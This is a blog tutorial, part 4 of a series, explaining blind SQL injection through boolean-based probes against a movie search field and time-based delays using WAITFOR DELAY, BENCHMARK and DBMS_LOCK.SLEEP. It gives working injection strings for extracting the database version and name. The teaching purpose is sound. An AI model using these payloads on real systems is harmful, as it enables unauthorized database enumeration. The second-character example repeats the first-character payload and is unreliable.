Injection attacks (Part 4)

BLIND SQL

The attacker will ask a series of questions to the DB to get the information.In one way it will help to prevent database enumeration “MYTH”. We will be breaking this myth in this post.

The only disadvantage with this type of attack is that it is very slow and time taking.If you have a lot of patience and time, feel free to do it.

There is a further sub categorization in blind SQL

  • Boolean based
  • Time based 

In Boolean based technique user will force a TRUE or FALSE statement just to check how the application behaves.

Whereas in time based technique, attacker sends a query which can either delay the execution or some other time based approach.

We will discuss both of them below


Boolean

We have a database which has movie names stored, lets try to find a movie

1)Searching for movie hero -ve response.

1blind
See the response “Movie does not exist”

2)Searching for iron man +ve response.

2blind
Response has changed now. Now we get started

3)Let’s play with the search string, # is for comment.

3blind
Here we have forced a true condition and since we know that both or conditions are true, the movie exists and 1=1 is always true. DB returns a positive

4)Now we have forced a false condition

4blind
Since movie exists and 1=2 is false, the overall result is false and thus DB returns a negative.

This confirms that it is vulnerable to Blind SQL.

< Since now we have confirmed this, Let’s play >

Version detection

1)Getting the version.We are checking if the version is 4 or not.

5blind
iron man’ AND substring(version(),1,1)=4#

2) Changing the argument 4 to 5, we get a positive response from the application

6blind
iron man’ AND substring(version(),1,1)=5#

Database enumeration

1)Playing with the input again

7blind
iron man’ AND length(database())=1#

2)The application will return a true response when the length=5

iron man’ AND length(database())=5#

Getting the DB name

Now we know that the length of the DB is 5, the DB name is  _ _ _ _ _.?

1)Getting the first character

iron man’ AND substring(database(),1,1)=’a’#

If the application returns a positive output we can conclude that the first character of the DB name is ‘a’.

We have to do this for all 26 characters or till the time a match is found.

2)Getting the second character

iron man’ AND substring(database(),1,1)=’a’#

It is a time taking approach but the results are mostly accurate.


Time based

1)Microsoft SQL servers has built in commands to delay the queries WAITFOR DELAY ‘hours:min:sec’. This will wait for 2 seconds before execution

http://www.test.com/test.aspx?id=25;waitfor delay ‘0:0:2’; —

2)MY SQL databases don’t have an equivalent for waitfor delay
but, the alternative is to use functions which take longer time to operate BENCHMARK. 

This function executes an expression specified number of times.

BENCHMARK(1000000,ENCODE(‘hi’,’Bye’));

3)ORACLE PL/SQL has something called DBMS_LOCK.SLEEP(seconds);

This puts a SQL procedure on sleep for specified number of times. But wait, we have a few restrictions for this. Since oracle doesn’t support stacked queries , it cannot be directly injected into a sub query. Another one is that it is an admin function.

 

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s